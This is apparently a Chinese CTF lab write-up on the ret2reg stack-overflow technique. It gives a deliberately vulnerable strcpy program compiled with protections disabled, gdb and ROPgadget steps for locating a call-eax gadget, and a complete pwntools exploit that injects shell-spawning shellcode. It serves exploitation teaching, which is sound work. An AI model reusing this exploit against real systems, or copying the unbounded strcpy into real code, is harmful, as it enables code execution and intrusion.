描述 | 内容 |
---|---|
程序名称 | ret2reg |
程序平台 | linux |
程序来源 | ctf_wiki |
CPU架构 | amd64 |
libc版本 | 2.31 |
利用手法 | ret2reg |
系统版本 | Ubuntu 20.04 LTS |
下载地址 | https://wwnd.lanzoue.com/irbut0qef3cb |
1.编写.c源程序
#include
#include
void vuln(char *input) {
char buffer[512];
strcpy(buffer, input);
}
int main(int argc, char **argv) {
vuln(argv[1]);
return 0;
}
2.编译命令
gcc -z execstack -no-pie -z norelro -fno-stack-protector -m32 ret2reg.c -g -Wall -o ret2reg
3.编译参数详解
参数 | 功能 |
---|---|
-W | 类似-Wall,会显示警告,但是只显示编译器认为会出现错误的警告。 |
-Wall | 意思是编译后显示所有警告 |
-g | 可执行程序包含调试信息,为了调试用的 |
NX | -z execstack / -z noexecstack (关闭 / 开启) 不让执行栈上的数据,于是JMP ESP就不能用了 |
Canary | -fno-stack-protector /-fstack-protector / -fstack-protector-all (关闭 / 开启 / 全开启) 栈里插入cookie信息 |
PIE | -no-pie / -pie (关闭 / 开启) 地址随机化,另外打开后会有get_pc_thunk |
RELRO | -z norelro / -z lazy / -z now (关闭 / 部分开启 / 完全开启) 对GOT表具有写权限 |
1.使用checksec检测到程序未开启任何防护
1.使用gdb调试程序,在vuln
函数里的leave
指令处下个断点,看一看程序要返回时缓冲区指向哪个寄存器
2.在gdb中设置一个参数并运行,观察到返回时EAX、ECX、EDX寄存器是指向缓冲区的
3.使用gdb的stack命令来看栈的返回地址偏移量
1.查找对应的call 寄存器或者jmp 寄存器指令,将EIP设置为该指令地址。
objdump -D -M intel ret2reg | egrep "eax|edx" |egrep "call|jmp"
2.这里也可以使用ROPgadget命令来寻找call/jmp指令
ROPgadget --binary ret2reg --only "call|eax"
1.编写exp脚本
from pwn import *
# 1.使用pwntools自带的功能生成shellcode
shellcode = asm(shellcraft.sh())
# 2.call eax的地址
call_eax = p32(0x0804901d)
# 3.构造payload
payload = flat([shellcode , b'a'* (0x20c - len(shellcode) ),call_eax])
# 4.启动进程传递参数
io = process(argv=[ "./ret2reg",payload])
# 5.获得交互式shell
io.interactive()
2.exp执行时的栈布局图
3.运行exp脚本
CTF Wiki Pwn Stackoverflow: ret2reg
一个栈溢出的实验
战队官网:https://www.edisec.net/
战队CTF靶场:https://ctf.edisec.net/#/index
战队新社区:https://bbs.edisec.net